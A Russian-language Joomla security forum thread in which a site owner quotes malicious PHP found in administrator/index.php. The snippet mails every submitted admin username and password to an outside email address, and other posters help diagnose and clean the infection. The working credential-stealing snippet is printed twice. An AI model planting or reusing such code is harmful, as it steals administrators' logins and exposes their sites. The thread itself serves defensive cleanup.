Странный файл появляется- php-mail.log - Безопасность сайтов на Joomla

Нечто, чего стандартно нет

Нечто, чего стандартно нет

Может снифер пассов какой встроен под маил функцию, зацените index.php!

if (isset($_POST['username']))
{

$v1 = 'Username: '.$_POST['username'].' - Password: '.$_POST['passwd'];
@mail('xanalyzer@yahoo.com', 'Rabbi pwd', $v1);

}

Точно, какая-то зараза прописала вот что:

Код

if (isset($_POST['username']))
{

$v1 = 'Username: '.$_POST['username'].' - Password: '.$_POST['passwd'];
@mail('xanalyzer@yahoo.com', 'Rabbi pwd', $v1);

}

При заходе в админку на сервер появляеться странный файл php-mail.log в папке .php со следующим содержанием:

Код

mail() on [/home/ru908887/domains/мой сайт/public_html/administrator/index.php:18]: To: xanalyzer@yahoo.com -- Headers: 

Что это такое и откуда нои растут?
Спасибо за объяснения!

первым делом, я так понял мне нужно сменить пароль и логин?

Папки .php не должно быть, то есть нужно удалить. И искать скрипт который в процессе запуска создает эту папку и  файл.

Нет, так как вводимые логин пасс, сразу отправляются злоумышленнику на почту, вам сначала нужно вычистить заразу, только потом менять все логины пароли в системе

Joomla не подвержена атакам уязвимости PHPMailer, если только не используется в стороннем приложении.
Так что дело скорее всего в другом.

Уязвимости в скриптах (1)
/мой сайт/public_html/libraries/phpmailer/phpmailer.php - RCE : CVE-2016-10045, CVE-2016-10031

Как так? А это шо? - Критические замечания:

Код

Уязвимости в скриптах (1)
/мой сайт/public_html/libraries/phpmailer/phpmailer.php - RCE : CVE-2016-10045, CVE-2016-10031

в соседней теме вам подсказали, что нужно сделать если хотите обновить библиотеку

Выше ж написали - не подвержена.
Лучше версию (историю версий) озвучьте, наличие сторонних расширений и вареза.
Ну и может сайт не 1 на аккаунте

моя наверно поддвежена, так как у меня ещё Joomla 1.5.26

В другой теме я давал ссылку на блог, где были патчи уязвимостей session
Вот если те патчи вовремя не применили, то была\есть подвержена той уязвимости

В другой теме я давал ссылку на блог, где были патчи уязвимостей session
Вот если те патчи вовремя не применили, то была\есть подвержена той уязвимости

Вроде.. может..
Смотреть надо что сидит и какие уязвимости есть.

Если поставили заплатку не в течении первого часа то существенная вероятность что заразали уже тогда.
А частичная чистка не поможет - даже если в одном месте шелл остался, всё будет повторяться